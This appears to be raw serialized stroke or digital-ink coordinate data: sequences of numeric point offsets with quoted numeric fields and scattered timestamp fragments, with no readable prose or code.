0,1-1 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,-1 0 0,1-1-1,6-8 1,-6 6-4,0 0 0,0-1-1,-1 0 1,0 0-1,0-1 1,3-9-1,1-4-3,-6 17 8,0 1 0,0 0 0,-1-1 0,0 1 1,0-1-1,0 1 0,1-10 0,-2 8 1,0 1 4,0-1-1,0 1 0,0 0 1,-1-1-1,1 1 0,-1 0 1,-1 0-1,1 0 0,-3-8 1,0 0 11,4 13-16,0-1 0,0 1-1,0-1 1,-1 0-1,1 1 1,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,-1-1 1,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,-1 0-1,1-1 1,0 1 0,-1-1-1,1 1 1,0 0-1,-1 0 1,1-1 0,-1 1-1,1 0 1,-1 0 0,0-1-1,-17-10 106,16 8-82,-1 1 0,1 0 0,-1 1 1,0-1-1,1 0 0,-1 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 1 0,0-1 0,0 0 0,-1 1 1,1 0-1,0 0 0,0 0 0,0 0 0,0 0 0,-1 1 0,-2 0 0,0 0-36,-1 1-1,1 0 1,0 0 0,0 0-1,0 1 1,0 0 0,1 0-1,-1 1 1,1-1 0,0 1-1,0 0 1,0 1 0,1-1-1,-1 1 1,1 0 0,0 0-1,0 0 1,1 1 0,0-1-1,-6 13 1,-9 24-1671,-3-1-3785,19-24 281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44 412,'0'0'581,"10"18"2334,-9-16-2804,-1-1 1,1 1 0,-1 0-1,1 0 1,0 0 0,-1-1-1,1 1 1,0 0-1,0-1 1,0 1 0,1-1-1,-1 1 1,0-1 0,0 1-1,1-1 1,-1 0 0,3 2-1,-2-3 867,-2 0-938,1 0 1,-1 0-1,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,-1 0 1,1 0-1,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 1,-1 1-1,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 1,0-1-1,0 1 0,0-1 0,0 0 0,11-40 1096,10 9-850,-21 32-278,0 0 0,0 0 1,0 0-1,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0-1 1,0 1-1,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 0 1,1 0-1,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 2 123,-6-4 484,15 33 345,2 30-786,0 5 289,14 32 445,-23-92-952,16 39 326,-17-43-341,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 1,0 1-1,0-1 0,1 1 0,-1-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,1 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,0 0 0,-1-1 0,3 1 0,-2 4-1843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28,'0'0'1227,"11"18"2886,-9-12-3822,0-1 0,1 1 0,0-1 1,0 1-1,0-1 0,4 5 0,0 1 64,6 11 213,-8-11-413,1-1 0,0 0-1,0 0 1,1 0 0,1-1-1,-1 0 1,2 0 0,-1-1 0,14 11-1,-20-19-211,-1 1 0,1-1 1,-1 0-1,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1-1 1,-1 1-1,1 0 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,1-2 0,21-26-2791,-2-15-308,-12 27 1987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8 204,'0'-1'-110,"18"-6"4636,-11 8-898,-12 8-1336,-1 0-1702,1 0-1,0 0 1,0 1-1,1 0 1,1 0-1,0 0 1,-3 10-1,-9 31 463,-21 68 220,18-51-764,-24 119 722,40-154-1108,2-31-134,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 0,-1-1 0,1 1 1,0-1-1,-1 0 0,0 1 0,0-1 0,1 0 1,-1 1-1,-1-1 0,0 3 0,1-7-576,0 1-1,1 0 1,-1 0 0,1-1-1,-1 1 1,1-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1 0,1 1-1,-1 0 1,1-1-1,-1 1 1,2-2 0,7-14-2963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0 756,'0'0'793,"22"5"5775,-33 28-1917,10-28-4184,0 1-1,-1 0 1,0-1 0,0 1 0,0-1-1,-6 10 1,-8 20 160,-24 56 115,34-72-564,1 0 0,1 1 1,-4 37-1,19 11 205,-11-61-378,1 1-1,0-1 1,1 0-1,0 0 1,0 0-1,0 0 1,1 0-1,0-1 1,0 1-1,1-1 1,0 1-1,0-1 1,0 0-1,1-1 1,0 1-1,0-1 1,0 0-1,1 0 1,-1-1-1,1 0 1,0 0-1,1 0 1,-1 0-1,1-1 1,-1 0-1,8 2 1,-12-5-228,1 1 1,-1 0-1,0-1 0,0 1 1,0-1-1,0 0 1,1 1-1,-1-1 1,0 0-1,0-1 1,0 1-1,5-1 0,1-8-3742,-5-11-3326,-3 9 4187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54 644,'4'27'4892,"-4"-24"-4729,1 0 0,0 0-1,0-1 1,0 1 0,0 0 0,1-1-1,-1 1 1,1 0 0,-1-1-1,1 0 1,3 4 0,14 16 422,-17-19-560,0 0 1,0 0-1,1 0 1,-1 0 0,1-1-1,-1 1 1,1-1-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0-1,1 0 1,4 1-1,-1-2 30,0 0-1,0 0 1,0 0-1,0-1 0,0 0 1,1 0-1,-1-1 1,0 0-1,0 0 0,0-1 1,0 0-1,0 0 1,0 0-1,-1-1 0,1 0 1,-1 0-1,0-1 0,10-7 1,-12 7 18,1-1 0,-1 0 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0-1 1,-1 0-1,1 0 0,-1 0 0,0 0 0,2-12 0,-4 16 42,0-1-1,-1 0 1,1 1-1,-1-1 1,1 1 0,-1-1-1,0 1 1,0-1-1,0 1 1,0-1 0,-1 1-1,1 0 1,0-1-1,-1 1 1,0 0-1,1 0 1,-1 0 0,0 0-1,0 1 1,0-1-1,0 0 1,-1 1 0,1 0-1,0-1 1,-1 1-1,1 0 1,-1 0 0,1 0-1,-1 1 1,1-1-1,-1 0 1,0 1 0,1 0-1,-1 0 1,0 0-1,1 0 1,-4 0 0,-4 0 20,1 0 0,0 1 0,-1 0 0,1 1 0,0 0 0,0 0 0,0 1 1,0 0-1,-9 5 0,14-6-168,-1 1 0,1-1 0,-1 1-1,1 0 1,0 1 0,0-1 0,0 0 0,1 1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 1-1,-1-1 1,-3 9 0,1 25-6199,16-37 1859,-1-1 1841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47 608,'10'-12'3090,"-9"11"-2979,0 1 1,-1-1-1,1 1 0,0-1 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 1 0,1-1 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-1 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,1-1 0,3-4 281,2-6 7425,-6 13-7742,0-1-1,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,0 0 1,0 0-1,0 0 1,-1 1-1,1-1 0,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 1-1,0-1 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,-1-1 1,1 1-1,0 0 1,-1 0-1,0 0 1,-12 17 388,12-17-387,-14 3-5,14-3-53,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,-1 0-1,1 0 1,0 0 0,0 1 0,0-1 0,0 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 1 0,-1-1-1,0 0 1,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0-14,-1 0 1,0 0 0,0 0-1,0-1 1,1 1 0,-1 0-1,0 0 1,0 0 0,0 1-1,1-1 1,-1 0-1,0 0 1,0 0 0,0 1-1,1-1 1,-1 0 0,0 1-1,0-1 1,1 0 0,-1 1-1,0-1 1,1 1 0,-1-1-1,1 1 1,-1 0-1,0 0 1,-22 10 32,23-9-27,0-1 0,-1 0-1,1 1 1,-1-1 0,1 0-1,-1 0 1,1 0 0,-1 0-1,0 1 1,0-1 0,1 0-1,-1 0 1,0 0 0,-2 1-1,-7 64-11,10-64 2,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,0 0 0,0 0 1,-1-1-1,1 1 0,1 0 1,-1-1-1,0 1 0,0-1 0,3 3 1,0 1-16,-1-2 12,0 0-1,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,-1 1 0,1-1 0,0 0 1,0 0-1,0-1 0,0 1 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 0 0,-1-1 1,1 1-1,0-1 0,0 1 0,-1-1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,6-6 0,-5 4-5,0 0 0,-1 0 0,1 0 0,0 0 0,-1-1 0,0 1 1,0-1-1,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,0-10 0,-1 12 7,0 1 1,-1-1-1,1 1 0,-1 0 1,0-1-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,0 1 0,0-1 1,0 0-1,0 1 0,0 0 1,0-1-1,0 1 0,0 0 0,-5-2 1,3 2-5,-1-1 0,1 0 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0 0 0,0 0 0,1 0 0,-1 0-1,-8 2 1,5 1-154,0 1 0,0 0 0,0 0 0,1 0 0,0 1-1,-9 8 1,-23 20-3573,21-18-432,6-2-1887,3-7 2973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18 756,'0'-17'6617,"0"28"-5005,0-6-1264,-1 0 1,1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,0-1 1,0 1-1,0 0 0,3 5 1,1 10 1000,1-2-313,-5-17-926,0 1-1,1 0 0,-1 0 0,-1 0 0,1 0 0,0 1 1,0-1-1,-1 0 0,1 0 0,-1 0 0,0 3 0,5 16 300,1-9-256,8 24 106,-13-34-260,-1 0-1,1 0 0,0 0 1,0 0-1,0 1 1,0-1-1,0 0 0,0-1 1,0 1-1,1 0 1,-1 0-1,1 0 0,-1-1 1,4 3-1,-3 5-1941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19 756,'-2'-19'9461,"-23"27"-3604,20-5-5562,0 1 1,0 0-1,1 0 1,-1 0-1,1 0 1,-5 6 0,5-5-269,1-1 1,-1 1 0,1 0 0,0 0-1,1 0 1,-1 0 0,1 0-1,0 0 1,0 1 0,1-1 0,-1 1-1,0 7 1,-9 35 356,11-44-383,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0-1-1,0 1 1,1 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,5 2-1,0 1 21,1-2-1,-1 1 1,1-1-1,0 0 0,0 0 1,1-1-1,9 2 0,-14-4-33,-1 0 0,1-1 0,0 1-1,0-1 1,-1 0 0,1 0 0,0 0-1,-1-1 1,1 1 0,0-1 0,-1 0 0,1 0-1,0 0 1,-1-1 0,0 1 0,1-1-1,-1 0 1,0 0 0,0 0 0,0 0-1,0 0 1,4-5 0,3-3-235,-1-1-1,0 0 1,-1 0 0,10-19 0,-17 28 218,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,0 0 1,-1-2-1,-22-38-58,17 31 82,5 8 17,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 1 0,-7-4 0,-20 2 259,26 3-265,0 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,1 1 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,-4 2 0,-38 16-2412,3-2-4956,39-16 6939,0-2-715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0 620,'0'0'1518,"2"11"624,-1-9-1870,1 0 1,-1 0-1,0 0 1,0 0 0,0 1-1,0-1 1,0 0-1,-1 0 1,1 1 0,-1-1-1,1 0 1,-1 1-1,0-1 1,0 0-1,0 1 1,0-1 0,0 0-1,-2 5 1,2 8 1888,11 16 1158,-12 6-1277,0-19-1696,1 0 0,1 0 0,0 0 1,8 36-1,2 12-94,-3-38-206,5 10-16,-5-23-39,-8-14-60,0 0-1,1 0 1,-1 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,2 1 0,-1-1-1338,-23-12-13487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5:56.1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5:56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44:36.2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13 132,'0'0'136,"0"-6"40,11 6-140,-11-6-16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52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52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3:32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20 457 472,'0'0'16252,"-19"-13"-13270,81-35-2742,-42 36-246,-2 0 0,31-26-1,5-2-50,-1-3 77,-23 23-5,7-9-9,17-7-146,-48 29 144,1 0 0,0 1 1,0 0-1,16-10 0,-8 0-36,-15 15 33,1 0-1,-1 0 1,1 0-1,-1 0 1,1 0-1,-1 0 1,1 1 0,0-1-1,-1 0 1,1 0-1,0 1 1,0-1-1,0 0 1,0 1 0,-1-1-1,1 1 1,0-1-1,0 1 1,0 0-1,0-1 1,1 1-1,13-7 132,-12 5-131,1 0 1,-1-1-1,0 1 0,1-1 1,-1 1-1,0-1 1,-1 0-1,6-7 1,11-8-21,-18 18 19,1-1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 0 0,-1 1 0,1-4 0,1 4 6,8-2 0,-11 1-3,1 1 20,-11 0 119,11 2-188,-1 12-60,-3-7 104,1 0-1,1 0 0,-1 0 0,1 1 0,0-1 0,1 1 0,0-1 0,-1 11 0,2 0-146,1-5 163,-1 0-1,-1-1 1,0 1-1,0 0 0,-6 21 1,5-23 8,0 0 1,1 0-1,0 1 1,1-1-1,0 0 1,2 18-1,0 10 0,9 23-2,-11 155 762,0-215-778,9-8-4025,-13 5 3638,-23-12-12587,17 13 9823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3:32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6 856,'13'-2'11873,"-3"-1"-9031,-6 3-2008,0 0-1,-1-1 1,1 1 0,0 1 0,0-1 0,-1 1-1,1-1 1,5 3 0,4 2-1110,-25-3-7370,5-2 5032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4T09:14:05.31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09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11 165 720,'0'0'2264,"0"7"522,0-8-2129,0-7 2139,1 8-2634,-1-1-1,0 0 1,0 1-1,1-1 1,-1 0 0,0 1-1,0-1 1,0 0 0,0 0-1,0 1 1,0-1-1,0 0 1,0 1 0,0-1-1,0 0 1,0 1-1,-1-1 1,1 0 0,0 1-1,0-1 1,-1 0-1,1 1 1,0-1 0,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1 0,1-1-1,-1 1 1,1-1-1,-1 1 1,1-1 0,-1 1-1,0 0 1,1-1-1,-2 1 1,0 0 547,5-5-608,0 1-1,1-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,6-4 0,51-40-78,-34 28-23,-20 14 0,1 1 0,0 0 0,0 0 0,10-5 0,-17 9 3,1 1 0,-1-1 0,1 1 1,0-1-1,-1 1 0,1 0 0,0-1 0,-1 1 1,1 0-1,-1 0 0,1 0 0,0 0 0,-1 1 1,1-1-1,0 0 0,-1 1 0,1-1 0,-1 1 1,1-1-1,-1 1 0,1 0 0,-1-1 0,1 1 1,-1 0-1,0 0 0,1 0 0,-1 0 0,2 2 1,24 14 31,7 3 66,-23-11-87,-10-8-15,1 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,1 0-1,-1 1 1,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 3 0,10 37-19,-12-33 30,-1 0 0,1 0 0,-1 0 0,-1-1 0,0 1 0,0-1 0,0 1 0,-6 8 0,-9 25 17,8-23-20,-1-1-1,0 0 1,-1 0 0,-1-1-1,-1-1 1,0 0-1,-29 24 1,-32 14 7,30-34-40,21-11 52,25-22-1,2-2-28,1 9 3,1 0 0,-1 0 0,1 0 0,0 1 1,0 0-1,1 0 0,0 0 0,8-5 0,-1 1 61,-12 8-56,0 1 1,0-1 0,-1 1 0,1-1 0,0 1-1,0-1 1,-1 1 0,1 0 0,0-1 0,0 1 0,0 0-1,0 0 1,-1 0 0,1-1 0,0 1 0,0 0-1,0 0 1,0 0 0,0 1 0,-1-1 0,1 0-1,0 0 1,0 0 0,0 1 0,0-1 0,-1 0 0,1 1-1,0-1 1,0 1 0,-1-1 0,1 1 0,0-1-1,0 1 1,-1-1 0,1 1 0,0 1 0,21 10-62,1 0 1,1-2 0,26 9 0,-36-15 59,0-1-1,1-1 1,-1 0 0,26 0-1,-19 4-663,-14-2-3155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0.2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1476,'0'-3'1769,"0"-10"3704,9 0-2929,10 6 1569,-9 6-5700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1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 1008,'-9'-1'7313,"7"1"-6903,12 26 974,-9-24-1219,1 0 0,-1 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 1,0 1-1,-1-1 0,1 0 1,-1 4-1,11 25 1511,0 11 198,-22 18-797,5-34-815,6-24-248,-1-1-1,0 0 1,1 1-1,-1-1 1,1 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,0 1 1,0-1-1,1 1 0,-1-1 1,1 1-1,-1-1 1,1 0-1,-1 1 1,1-1-1,0 0 1,0 1-1,1 1 1,3 11 48,-5-14-54,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 1,0-1-1,0 1 1,1-1-1,-1 0 0,0 1 1,0-1-1,0 1 0,1-1 1,-1 0-1,0 1 0,1-1 1,-1 0-1,0 0 0,0 1 1,1-1-1,-1 0 0,1 0 1,-1 1-1,1-1 0,14 12-523,-15-12 479,0 0 1,0 0-1,0 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,1 0 0,-1 1 0,0-1 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,0 1 0,0-1 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 1 1,0-1-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 0,1 1 1,0-1-1,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1 0 0,1 0 1,0 0-1,0 0 0,0 0 0,0 0 0,-1 0 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2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0 187 556,'1'-4'554,"1"-1"-1,-1 1 0,1 0 1,0-1-1,0 1 1,0 0-1,0 1 1,1-1-1,0 0 1,5-5-1,9-15 1199,-13 19-1493,1 0 1,0 0-1,-1 1 0,2-1 0,-1 1 0,0 0 1,1 1-1,0-1 0,0 1 0,12-5 0,29-19 998,-38 22-1048,0 0 0,1 0-1,0 1 1,0 1 0,0-1 0,0 2 0,0-1 0,1 1 0,-1 1-1,18-1 1,-23 3-187,-1-1 0,0 1 0,0 1 0,0-1 0,1 0 0,-1 1 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 1-1,-1 0 1,0 0 0,0 0 0,0 0 0,3 4 0,-3-1 42,0 0 0,-1-1 0,0 1 0,0 0 0,0 0-1,-1 0 1,1 0 0,-1 0 0,-1 0 0,1 1 0,-2 6 0,1-10-24,-1 1 0,0-1 0,0 0 1,0 0-1,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 1,0 0-1,0-1 0,0 1 0,0-1 0,-1 0 0,1 1 1,-1-1-1,-4 2 0,-13 17 45,14-15-87,-1 0-1,1-1 1,-1 0 0,0 0 0,0 0 0,-16 6-1,12-4 24,9-6-17,0 0 8,-1 1 0,1 0 1,-1 0-1,1-1 1,-1 1-1,0-1 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0-1 1,0 0-1,0 1 1,0-1-1,0-1 0,0 1 1,0 0-1,0-1 1,0 0-1,-6-1 1,-3-4 44,11 6-31,0 0-1,0 0 1,0 0-1,0-1 0,0 1 1,0 0-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 0,0 1 1,1-1-1,-1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,0 1 1,1-1-1,-1 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,1 0 1,-1-2-1,1 2 74,33 14 70,-25-12-55,0 1 0,0 0 1,1 1-1,-2 0 0,1 1 0,0-1 0,13 10 1,-12-8-52,27 19 316,-28-18-265,1-1 0,-1 1-1,1-1 1,0-1 0,0 0-1,11 4 1,-6-3 104,-1 1-1,1 1 0,-1 0 1,0 1-1,-1 0 0,0 1 1,11 11-1,44 29 609,-66-49-857,0 1-1,1-1 1,-1 1 0,0-1-1,0 0 1,1 1-1,-1-1 1,0 0 0,0 0-1,1 0 1,-1 0 0,0 0-1,1 0 1,-1 0-1,0-1 1,0 1 0,2-1-1,3-4-1554,-11-1-3474,3-12-5264,2 10 5839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86 189 464,'33'-11'3716,"-20"6"-3413,0 0-1,-1-1 1,1 0-1,-1-1 1,0 0-1,-1-1 1,0 0-1,0-1 1,0 0 0,10-13-1,-19 20-105,0-1 1,0 1-1,0 0 0,0-1 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-2-6 1,0 7 37,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 1,-1-1-1,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 1,0 0-1,0 0 0,-4-1 0,-4 2-85,0 0 0,0 1 1,0 0-1,0 1 0,0 0 0,0 0 1,0 1-1,0 0 0,1 1 0,0 0 0,0 0 1,0 1-1,0 1 0,1-1 0,0 1 0,-13 13 1,-3 5 215,19-20-333,1-1 0,0 1-1,0 0 1,0 1 0,1-1 0,-1 0-1,1 1 1,0 0 0,0 0 0,1 0-1,-1 0 1,1 0 0,0 0 0,1 1-1,-1-1 1,1 1 0,0-1 0,0 7-1,1-11-27,1 1 0,-1-1-1,0 1 1,1-1 0,0 0 0,-1 1-1,1-1 1,0 0 0,-1 1-1,1-1 1,0 0 0,0 0-1,0 0 1,0 0 0,0 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0-1 0,1 1-1,1 0 1,42 14 67,-25-9-44,-4-2-35,1-1-1,-1-1 1,0 0 0,1-1 0,0-1-1,24-3 1,11 0-343,14 3-2659,-26 0-5925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4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78 124 104,'0'0'94,"0"-1"0,0 1 0,0 0-1,0-1 1,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1-1-1,0 1 1,0 0 0,0-1 0,0 1 0,0 0 0,-1-1 0,1 1-1,0 0 1,0-1 0,-1 1 0,1 0 0,0 0 0,0-1 0,-1 1 0,1 0-1,0 0 1,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0-1,0 0 1,-1 0 0,-42 17 4517,41-16-4430,0 1 0,0-1 0,1 1 1,-1-1-1,0 1 0,1-1 0,-1 1 1,1 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 1,0 0-1,0 3 0,0-2-168,1-1-1,-1 0 1,1 0-1,0 0 1,0 1-1,-1-1 1,2 0-1,-1 0 1,0 1-1,0-1 1,1 0-1,-1 0 1,1 0-1,0 0 1,-1 0-1,1 1 1,0-1-1,0-1 1,1 1-1,-1 0 1,0 0-1,0 0 1,1-1-1,-1 1 1,1 0-1,0-1 1,3 3-1,-1-1-6,1 0 0,0 0-1,0 0 1,0-1 0,0 0-1,0 0 1,1 0 0,-1 0-1,1-1 1,-1 0 0,1 0-1,-1-1 1,1 0 0,0 1-1,-1-2 1,1 1 0,-1-1-1,1 0 1,-1 0 0,9-3 0,-4 1-3,-1 0 1,1-1 0,-1-1 0,0 1-1,-1-1 1,1-1 0,-1 0 0,0 0-1,0 0 1,10-13 0,-6 7-1,10-18 4,-13 15 27,-7 13-29,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 1,-1-1-1,1 1 0,-1 0 1,0 0-1,0-4 0,0 4 37,1-1-1,-1 1 1,0-1-1,0 1 1,-1-1 0,1 0-1,0 1 1,-1-1-1,0 1 1,0-1-1,1 1 1,-1 0-1,-1-1 1,1 1 0,0 0-1,0-1 1,-1 1-1,0 0 1,1 0-1,-5-3 1,3 2 50,-1 0 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1 1 0,-5 0 0,0-1-23,0 2-1,1-1 0,-1 2 1,1-1-1,-1 1 1,1 0-1,-14 8 1,20-9-68,1 0-1,-1 0 1,1 1 0,-1-1-1,1 1 1,0-1 0,0 1-1,0 0 1,0 0 0,0 0-1,1 0 1,0 0 0,-1 0 0,1 1-1,0-1 1,0 0 0,1 1-1,-1-1 1,1 1 0,0-1-1,0 0 1,0 1 0,0-1-1,1 5 1,-1-7-1,1 0 0,-1 1 0,1-1 1,-1 0-1,1 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0-1 0,0 1 1,0 0-1,0 0 0,1 0 0,-1-1 0,3 2 0,28 10 34,-24-11-35,0 0 0,-1-1 1,1 1-1,0-2 0,0 1 1,0-1-1,0 0 0,0-1 1,0 0-1,-1 0 0,15-7 1,21-4 5,-43 13-3,1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,0 0 0,0 1 0,0-1-1,0 0 1,-1 1 0,1-1 0,0 0-1,0 1 1,0-1 0,-1 1-1,1-1 1,0 1 0,-1 0 0,1-1-1,0 1 1,-1 0 0,1-1-1,-1 1 1,1 0 0,-1 0 0,1 0-1,-1-1 1,1 1 0,-1 0 0,0 0-1,0 0 1,1 0 0,-1 0-1,0 0 1,0 0 0,0-1 0,0 1-1,0 0 1,0 0 0,-1 2 0,2 52 408,-2-40-196,2-6-145,1 1 0,0-1-1,0 0 1,1 0 0,0 0-1,1 0 1,0-1 0,0 1 0,1-1-1,0 0 1,9 11 0,21 41 448,-24-43-436,-10-15-102,1 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,0 1 0,0-1-1,-1 1 1,1-1 0,0 0 0,-1 1 0,0 0 0,1 4 0,2 10-735,-3-17 654,1 1 0,-1 0 0,0-1 0,0 1-1,1 0 1,-1 0 0,0-1 0,0 1 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0 0,0 0-1,0-1 1,0 1 0,-1 0 0,1 0 0,0-1-1,0 1 1,-1 0 0,1-1 0,0 1 0,-1 0-1,-2 9-2796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8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49 112,'9'-14'2702,"-7"9"1123,-12-12 4179,3 8-6911,12 6-362,-4 52-10,0-45-699,-1 0 0,0 0 0,0 0 0,-1-1 0,1 1 1,-1 0-1,0 0 0,0-1 0,0 1 0,0 0 0,-3 3 1,4-3-10,-1 0 1,0 1-1,1-1 0,0 1 1,0-1-1,0 0 1,1 1-1,-1-1 1,1 0-1,0 1 1,2 3-1,2 25 44,-5-20-17,0-11-40,-1-1 1,1 1 0,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,1 0 0,-1-1-1,1 1 1,-1-1 0,1 1-1,0-1 1,-1 1 0,1-1-1,0 1 1,0-1 0,0 0-1,1 2 1,-2-3-163,0 0 0,0 0 0,-1 0 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,-1 1-1,1-1 1,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 1-1,-1-1 1,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 1 0,-8-14-5976,8 2 2778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8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1 404,'0'0'3098,"-20"12"10097,39-9-13397,-16-1-870,0-1 1,0-1 0,0 1 0,1 